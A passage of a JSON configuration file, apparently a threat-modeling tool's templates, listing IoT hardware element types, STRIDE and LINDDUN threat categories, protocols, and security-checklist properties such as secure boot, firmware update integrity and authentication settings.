Mobile","ID":"e9148055-f813-45da-85a8-bfcf4d71ff40","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ElementTypeID":72},{"Name":"PCB","Description":"","ElementTypeID":72,"IsDefault":false,"Properties":[{"DisplayName":"Is Custom Design","ID":"IsCustomDesign","Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Is In-House Produced","ID":"IsIn-HouseProduced","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Is Replaceable","ID":"IsReplaceable","Editable":true,"Type":"Check Box","DefaultValue":true}],"ID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f"},{"ID":"361cf331-bd80-413d-835a-ac900f091906","Name":"Chip/IC","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":72},{"ID":"74245351-b923-4cd6-b9e7-fe9f9916cbf5","Name":"SQL Database","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":21},{"ID":"0e15730c-980a-4a58-a2e2-b10b9de30d6d","Name":"Button","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51,"PropertyOverwrites":[{"Key":"NewProperty1","Value":false},{"Key":"NewProperty3","Value":true}]},{"ID":"6b505c9a-c505-4305-8c07-a3cde1c1ddfc","Name":"Display","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Enables Authentication","ID":"04fc735e-8da5-409d-93c9-5d56eb0a852d","Tooltip":"Users can log in to the system, usually by entering username and password.","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ElementTypeID":51,"PropertyOverwrites":[{"Key":"NewProperty1","Value":false},{"Key":"NewProperty3","Value":true}]},{"ID":"1dc32bac-147f-42a4-a13c-44e5b59f7b81","Name":"Battery Power Supply","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51},{"ID":"e75f9804-6ae3-4eb6-9011-4b87a0d4823b","Name":"Wired Power Supply","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Is Pluggable ","ID":"cef5bbac-5833-49bb-9021-9f5200c29c83","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ElementTypeID":51},{"ID":"5f755466-4417-4060-83de-64bddeabd1ba","Name":"Car Battery","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51,"PropertyOverwrites":[{"Key":"NewProperty3","Value":true}]},{"ID":"4b7a61d0-c430-48ea-8730-03a81542a5d8","Name":"Microphone","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51},{"ID":"210ba217-67da-4bda-9063-3c95716eb5b9","Name":"Loudspeaker","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51},{"ID":"c2d71a11-6228-4e05-bc93-0ddd45328fde","Name":"Camera","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Can Record Humans","ID":"38883a00-d18f-4d1f-8a4c-18741a480557","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Has Gesture Recognition","ID":"d9919a71-0642-46a5-8056-348e06f8b86e","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ElementTypeID":51},{"ID":"5deb66fa-ff3e-49b6-b0d2-66a39708d259","Name":"Motor","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51,"PropertyOverwrites":[{"Key":"NewProperty1","Value":false},{"Key":"NewProperty3","Value":true}]},{"ID":"2d7223ec-7361-4f2a-bfea-d6c437e9a4f4","Name":"Key File","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Is Encrypted","ID":"5fccd43c-b3f0-405a-bfcc-8d2bb73bdd9e","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ElementTypeID":21},{"ID":"59076fab-74e3-415a-93f5-fffd12e3d79c","Name":"Web Server","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":11},{"ID":"ed2c7ab5-2fbf-44fc-83b1-d06b38e861f3","Name":"User","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":32},{"ID":"2ca5ca37-5df9-4b94-ad56-b383c1f7be40","Name":"Bluetooth","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":41,"PropertyOverwrites":[{"Key":"ProtocolStack","Value":["f805dd78-eac2-4967-8dfc-231605a75ace"]}]},{"ID":"0a168b12-fc9a-411c-bbf0-59599d0181f8","Name":"Cloud Service","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":11},{"ID":"45244917-e4a2-4b03-89de-f18e9ddcad3f","Name":"Authentication","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":11},{"ID":"6f4e4f07-79e0-4f16-b447-dbc325b42e91","Name":"Cloud Service","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":31},{"ID":"de170dec-af60-4cc7-8daf-946b3fa53132","Name":"RFID","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Has EPC","ID":"355ded09-e3ae-41f7-8bbb-3fa0870e35a6","Tooltip":"Has Electronic Product Code (EPC)","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ElementTypeID":61,"templateDFDID":"090e631e-a7e9-43be-9f36-e03da6e8e5c0"},{"ID":"840b5bd1-b250-427c-bf56-5ddf826382ff","Name":"GPS","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":61,"templateDFDID":"0981c2a9-a7a2-4497-b60e-076a7bfa8860"},{"ID":"7edf2806-e7a8-4a26-b1cf-2a3de3d41b53","Name":"Modbus","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":61},{"Name":"Profibus","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[],"ID":"b7057a19-76b2-4cf5-9d7a-e3335079fa5f","templateDFDID":"0d96e10f-fddd-4855-9efa-e2480847866a"},{"ID":"60eaa240-6b5f-4c62-b33f-77c772c9375a","Name":"Profinet","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":61}],"stencilTypeTemplates":[{"ID":"943f0836-0524-46a0-b495-9e5dc5c8f39e","Name":"Microcontroller","Description":"","stencilTypeIDs":["8bd42f0c-a4d2-4d98-9dcb-b9b100114fa5","69401648-0084-45ca-b984-505173c9cdb1","4409e854-5f53-4e7e-bee5-232c0e27fb40","cf7355d0-6f0c-4ad8-afa2-8689a81e28b8","361cf331-bd80-413d-835a-ac900f091906"],"ListInHWDiagram":true,"ListInElementTypeIDs":[12,72],"Layout":[{"x":20,"y":40,"canEditSize":false,"width":340,"height":250,"name":"Microprocessor"},{"x":180,"y":40,"canEditSize":false,"width":0,"height":0,"name":"SRAM"},{"x":20,"y":135,"canEditSize":false,"width":0,"height":0,"name":"FLASH"},{"x":180,"y":135,"canEditSize":false,"width":0,"height":0,"name":"JTAG"},{"x":0,"y":0,"canEditSize":true,"width":340,"height":250,"name":"Chip"}],"CanEditInWhichDiagram":true},{"ID":"ffd00d05-c506-4bf9-af35-0b0f56234515","Name":"CAN Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"CAN Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"CAN Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"CAN Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"054dd0d3-961a-4f18-9aee-92ac1b515392","Name":"USB Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"USB Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"USB Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"USB Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"0d2497f5-d83a-44ac-91ca-6453a7a0e2b4","Name":"SPI Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"SPI Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"SPI Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"SPI Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"5135733f-bcb2-459e-a84b-048c832f5616","Name":"RF Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"RF Module Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"RF Module Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"RF Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"1ad7afbf-59a5-41ec-905e-621602e17ea6","Name":"WiFi Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"WiFi Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"WiFi Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"WiFi Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"f6abd33c-f527-4621-9a09-1ee5466aee01","Name":"Bluetooth Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"Bluetooth Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"Bluetooth Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"Bluetooth Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"0d96e10f-fddd-4855-9efa-e2480847866a","Name":"PROFIBUS Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"PROFIBUS Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"PROFIBUS Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"PROFIBUS Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"090e631e-a7e9-43be-9f36-e03da6e8e5c0","Name":"RFID Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"RFID Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"RFID Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"RFID Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"0981c2a9-a7a2-4497-b60e-076a7bfa8860","Name":"GPS Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"GPS Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"GPS Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"GPS Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true},{"ID":"fad91fd1-0a2b-4ab0-a069-5362948e5f47","Name":"Ethernet Module","Description":"","ListInHWDiagram":true,"ListInElementTypeIDs":[],"Layout":[{"name":"Ethernet Handler","x":20,"y":40,"canEditSize":false,"width":0,"height":0},{"name":"Ethernet Data Storage","x":20,"y":200,"canEditSize":false,"width":0,"height":0},{"name":"Ethernet Module","x":0,"y":0,"canEditSize":true,"width":180,"height":290}],"stencilTypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","edd93ea1-6122-492c-bbef-332ecf0113b3"],"CanEditInWhichDiagram":false,"ListInUCDiagram":true}],"stencilThreatMnemonics":[{"ID":"c262c90f-3076-43f2-8de3-0cada1f881cd","Name":"STRIDE","Description":"","Letters":[{"Name":"Spoofing","Letter":"S","Description":"Threat against the security goal authenticity","AffectedElementTypes":[11,12,31,32,51],"threatCategoryID":"3bbe354c-317a-4f76-bdbb-75543b5d5aa4","ID":"89012bfb-6c3e-465b-aa8c-31e41614968f"},{"Name":"Tampering","Letter":"T","Description":"Threat against the security goal integrity","AffectedElementTypes":[11,12,21,22,72,41,51,61],"threatCategoryID":"f0e814f3-b3d2-4357-b155-8fffd70ec42e","ID":"b09d9704-9868-446d-a6a6-f91761d223ef"},{"Name":"Repudiation","Letter":"R","Description":"Threat against the security goal Non-repudiation","AffectedElementTypes":[11,12,31,32],"threatCategoryID":"a77f314c-f74e-4340-a993-5a1a24f26db4","ID":"111e4a03-1420-4cc4-8a8c-b649258851f0"},{"Name":"Information Disclosure","Letter":"I","Description":"Threat against the security goal confidentiality","AffectedElementTypes":[11,12,21,22,41,51,61],"threatCategoryID":"369640cc-1b53-4a2e-9e3b-a74c187e68e7","ID":"1da5e6cb-43b9-4fbb-acaa-5437d658bf31"},{"Name":"Denial of Service","Letter":"D","Description":"Threat against the security goal availability","AffectedElementTypes":[11,12,21,22,41,51,61],"threatCategoryID":"422b9042-212d-4467-a000-2528a2e09f8b","ID":"4cb90c1b-9c46-4666-99ff-151e3f7fb122"},{"Name":"Elevation of Privilege","Letter":"E","Description":"Threat against the security goal authorization","AffectedElementTypes":[11,12],"threatCategoryID":"8687e614-c127-418b-8fda-536bb2f0708f","ID":"7ab5111c-e480-41e6-9c6d-0c48433fac72"}]},{"ID":"1e834e57-12f5-4679-8027-434d1e5812a2","Name":"LINDDUN","Description":"https://www.linddun.org/linddun","Letters":[{"Name":"Linkability","Letter":"L","Description":"An adversary is able to link two items of interest without knowing the identity of the data subject(s) involved.","AffectedElementTypes":[11,21,31,41,51,61,32,22,12],"threatCategoryID":"55379fba-d815-4e29-bd4b-9aa674ed6821","ID":"dc68752a-08bc-4359-858d-b84ad3ede975"},{"Name":"Identifiability","Letter":"I","Description":"An adversary is able to identify a data subject from a set of data subjects through an item of interest.  \u200b","AffectedElementTypes":[11,21,31,41,51,61,32,22,12],"threatCategoryID":"5278c995-f9d9-410e-b012-2995ba30c353","ID":"2062fc21-5b59-44a5-9ba2-88bdf22710a7"},{"Name":"Non-Repudiation","Letter":"N","Description":"The data subject is unable to deny a claim (e.g., having performed an action, or sent a request).","AffectedElementTypes":[11,21,41,51,61,22,12],"threatCategoryID":"700f5437-7d03-4bff-a0e6-50cfb82dc0e5","ID":"c1d68de4-a522-4cf8-8f95-501b2f422498"},{"Name":"Detectability","Letter":"D","Description":"An adversary is able to distinguish whether an item of interest about a data subject exists or not, regardless of being able to read the contents itself.","AffectedElementTypes":[11,21,41,51,61,22,12],"threatCategoryID":"b98738a0-f79e-4b1e-86df-0e716eb61bc0","ID":"b96ae216-002a-48fd-97b2-5807ea74f696"},{"Name":"Disclosure of Information","Letter":"D","Description":"An adversary is able to learn the content of an item of interest about a data subject.","AffectedElementTypes":[11,21,41,51,61,22,12],"threatCategoryID":"da86b5fc-d15d-41f7-a98f-01fe5e143651","ID":"22de5b16-e0db-43b6-9a80-2618e3848f88"},{"Name":"Unawareness","Letter":"U","Description":"The data subject is unaware of the collection, processing, storage, or sharing activities (and corresponding purposes) of the data subject\u2019s personal data.","AffectedElementTypes":[31,32],"threatCategoryID":"aead4d1d-0f64-42b4-a512-cbbc979af3ca","ID":"10cdb2c2-e4ec-4d88-86a8-934339f84ed8"},{"Name":"Non-Compliance","Letter":"N","Description":"The processing, storage, or handling of personal data is not compliant with legislation, regulation, and/or policy.","AffectedElementTypes":[11,21,41,51,61,22,12],"threatCategoryID":"2521b219-3d43-4fd8-bf96-d658eea44d01","ID":"24a57fc5-2005-4867-8c56-b1a96ea38be9"}]},{"ID":"40ae1e0b-e25a-4285-a580-3f2d68d6cb75","Name":"Safety & Privacy","Description":"","Letters":[{"Name":"Safety","Letter":"S","Description":"Threats threatening the safety of operation, humans, and machines","AffectedElementTypes":[51,41,32],"threatCategoryID":"17a04fbd-365f-4345-97f8-88d3c7382ec1","ID":"df1e858e-538b-4f26-b6e1-ea7813e63d3d"},{"Name":"Privacy","Letter":"P","Description":"Threats threatening the privacy","AffectedElementTypes":[51,11,21,22,12,41],"threatCategoryID":"7bbfe5d3-8a91-4210-99ab-79f670715e61","ID":"5ae41943-50b7-46c3-acbb-97c70e085c39"}]}],"protocols":[{"ID":"5c833fba-2a5b-4d15-bc48-f4a6e74ddc27","Name":"Protocol","Description":"","IsDefault":true,"Properties":[{"DisplayName":"Provides Confidentiality","ID":"ProvidesConfidentiality","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Provides Integrity","ID":"ProvidesIntegrity","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Provides Sender Authenticity","ID":"ProvidesSenderAuthenticity","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Provides Receiver Authenticity","ID":"ProvidesReceiverAuthenticity","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}]},{"ID":"857c7b5e-e034-41f8-9b60-ee11aa9771f1","Name":"HTTP","Description":"","IsDefault":false,"Properties":[]},{"ID":"21731335-5e66-455c-9b6a-6796ac85577a","Name":"HTTPS","Description":"","IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"New Property2","Value":true},{"Key":"New Property1","Value":true},{"Key":"ProvidesConfidentiality","Value":true},{"Key":"ProvidesIntegrity","Value":true},{"Key":"ProvidesReceiverAuthenticity","Value":true}]},{"ID":"f805dd78-eac2-4967-8dfc-231605a75ace","Name":"Bluetooth","Description":"","IsDefault":false,"Properties":[]},{"ID":"c4ce892e-975c-48f5-a0f8-e6eb7591111d","Name":"Proprietary Protocol","Description":"","IsDefault":false,"Properties":[]}],"myComponentSWTypes":[{"ID":"551ef8ab-1707-4d4c-9845-c8dcc7515fe9","Name":"Operating System","Description":"","ComponentTypeID":1,"IsActive":true,"IsThirdParty":true,"Properties":[{"DisplayName":"Has Only Required Components","ID":"a7e3fa91-ce20-42b3-8e35-e0188ca1ac50","Tooltip":"Does the operating system only include components (libraries, modules, packages, ...) that are required to support the function of the device?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Latest OS Version","ID":"4ba05121-485a-40eb-832a-f4095c7b88df","Tooltip":"Is the OS the latest available stable version?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Secure Config Is Default","ID":"41b3d476-6ff9-40d7-ad5b-c5d5fad4cda1","Tooltip":"Does the device ship with the most secure configuration in place (security by default)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Component Update Process","ID":"36ed4680-0b94-42a9-9863-08eb976c9ebc","Tooltip":"Is there a process to update OS components to the latest stable version throughout the lifetime of a deployed device?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Activated Ports","ID":"fb3b36de-11b3-4e5d-9c9c-4dcfab666da6","Tooltip":"Are all ports, protocols, and services that are not used deactivated?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Root Access Restricted","ID":"c93fbf95-01d7-45fb-a786-0eb926e6dc2c","Tooltip":"Is the access to the root file system restricted for users/applications?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Follows Least Privilege Principal","ID":"7378780b-e280-4494-84f2-0beb4e7257ec","Tooltip":"Have all files and directories the minimum required access rights (least privilege principal)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"File System Is Encrypted ","ID":"85e19877-51a0-4904-8e98-b2fb14be3922","Tooltip":"Is the file system encrypted?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Name":"Trusted Computing Base","Description":"See section C and M of https://www.iotsecurityfoundation.org/wp-content/uploads/2019/12/Best-Practice-Guides-Release-2_Digitalv3.pdf\\nand section 6.1 of https://www.gsma.com/iot/wp-content/uploads/2020/05/CLP.13-v2.2-GSMA-IoT-Security-Guidelines-for-Endpoint-Ecosystems.pdf","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Secure Boot","ID":"4f0c5fb9-e24f-487a-b192-66d10c2b97a5","Tooltip":"Does the device implement a secure boot?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Root Of Trust","ID":"17b59f51-59d3-4a8f-9960-a04ce7e96be6","Tooltip":"Does the device has a immutable Root Of Trust in hardware?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Proper Boot Order","ID":"eb678bc0-3ece-4937-bba3-03981c5759a4","Tooltip":"Does the device boot the next stage only after the successful boot of the previous stage? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Checks Immediately Before Execution","ID":"f3697413-e4de-4572-90b1-8041e8ff9b67","Tooltip":"Is code checked for validity and trust immediately before running the code (to reduce Time of Check to Time of Use attacks)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Boot Code Protection in RAM","ID":"885834f4-b8b6-485b-8690-6ac525dbb59d","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Trusted Execution Environment","ID":"22e9ef37-20a4-4b6c-ba68-ecc90f1d152f","Tooltip":"Does the Trusted Computing Base utilize a Trusted Execution Environment for isolation of critical operations?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Isolates Cryptographic Operations","ID":"28c99516-8651-452e-86f7-ce00df632c8d","Tooltip":"Are cryptographic operations (encryption, message signing, key exchange, key storage) performed by the Trusted Computing Base?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Name":"Firmware Update","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Is Updatable","ID":"367b80cd-1b41-483b-a157-b143714b8af7","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Prevents Roll-Back","ID":"d951b792-f84b-4ab3-82d1-21867e202755","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Validating Integrity","ID":"8f47a4ac-0934-4a65-a6f3-07503c92f658","Tooltip":"Does the update routine cryptographically validate the integrity of a software update package before the installation begins?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Validating Authenticity","ID":"00f961fc-97ce-4003-8f2e-79a4748ec0b2","Tooltip":"Does the update routine cryptographically validate the authenticity of a software update package before the installation begins?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Allows TOCTOU attack","ID":"000441ff-d15f-46c3-bb9c-0c949063271d","Tooltip":"Does the system ensure that the package cannot be modified or replaced by an attacker between being validated and installed - a TOCTOU (Time of Check to Time of Use) attack?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Fail Safe Mechanism","ID":"3df6a845-52a2-40a9-8978-0277efd7cfcb","Tooltip":"Does the system implement a fail safe mechanism that will leave the system in a known safe state in the event of a failed update?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Encrypted","ID":"434d79b2-574c-4575-813b-19ec7854a139","Tooltip":"Is the firmware update encrypted?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"838f741c-120e-4b73-951a-d55a11d36ca4","Name":"Cryptography","Description":"","ComponentTypeID":1,"IsActive":true,"IsThirdParty":true,"Properties":[{"DisplayName":"Uses Risky Cryptographic Algorithm ","ID":"783c742d-ebbf-4a58-b8c9-bdc0faeff57d","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Allows Downgrade","ID":"56a10ad5-a9bf-426f-8e83-ba07561ca78b","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Weak Block Cipher Mode","ID":"518bbb50-aeee-4c87-95d1-8724a4dac569","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Appropriate Parameters","ID":"08377961-8f56-4b56-b684-331f77810f1d","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Sufficient Entropy","ID":"420f03a2-1ab7-4bc2-910d-4ea025518da2","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Reuses Nonces","ID":"f35ccff8-6497-4b28-8627-7f255bce0e02","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Implements PFS","ID":"6cce79b8-3df2-4eda-8892-e83b6a2ee603","Tooltip":"Is Perfect Forward Secrecy (PFS) implemented whenever possible/required?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","Name":"Authentication","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Hard-Coded Credentials","ID":"e1e92ae3-ee61-4cae-bfb5-be18e97ea587","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Default Credentials","ID":"714ed1de-855c-491b-8a08-745a99e17413","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Password Requirements","ID":"540e39da-3227-4e6c-86ea-32a017318511","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Multi-Factor Authentication","ID":"88763e20-7878-4525-81d8-c4d09b867042","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Restriction of Attempts","ID":"aa74f499-b995-4f5e-8d92-91f3ca172743","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Session ID Expiration","ID":"51473250-3891-4342-a8b8-687db16ffef3","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Session Timeout","ID":"a21a6894-256f-4bfd-bd49-09352d054399","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Strong Password Recovery","ID":"a9b6390d-0145-4e0f-8420-8a9b8f728c3d","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Client-side Hashing","ID":"ba8dc5f0-e1a9-4263-8179-747791b873ee","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Exposes Sensitive Information","ID":"157fd588-2ea2-4260-9a25-86bf8241b31c","Tooltip":"Does an authentication response contain information which requirement is not fulfilled (e.g. password/username is wrong)? ","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","Name":"Error Handling","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Handles All Exceptions","ID":"897ef1fd-f1e7-4527-89e3-2cdaf2c8644a","Tooltip":"Can unhandled exceptions occur?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Exposes Sensitive Info","ID":"f7733c50-2529-459f-9397-8d06f231121c","Tooltip":"Do error messages reveal details about the internal state (e.g. stack information, path, passwords)?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","Name":"Device Management","Description":"","ComponentTypeID":1,"Properties":[{"DisplayName":"Device Has Tamper Resistant Unique ID","ID":"08ee42e8-3525-4767-98e3-f7492f356d2f","Tooltip":"Is the device uniquely identifiable (the ID is factory-set and tamper resistant stored in hardware)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Secure Management Access","ID":"6962d897-bf88-4745-9f2c-a8aa9d981f93","Tooltip":"Is the access for device management secured (unique password/certificate, MFA, etc.)?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Name":"User Management","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Unique User IDs","ID":"6391f8f2-eb04-4caf-b490-49c920315867","Tooltip":"Are users identified by a unique identifier? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Enables Different Privileges","ID":"cdb65d33-946e-412e-838b-3075e928c4f0","Tooltip":"Is it possible to assign different privileges to 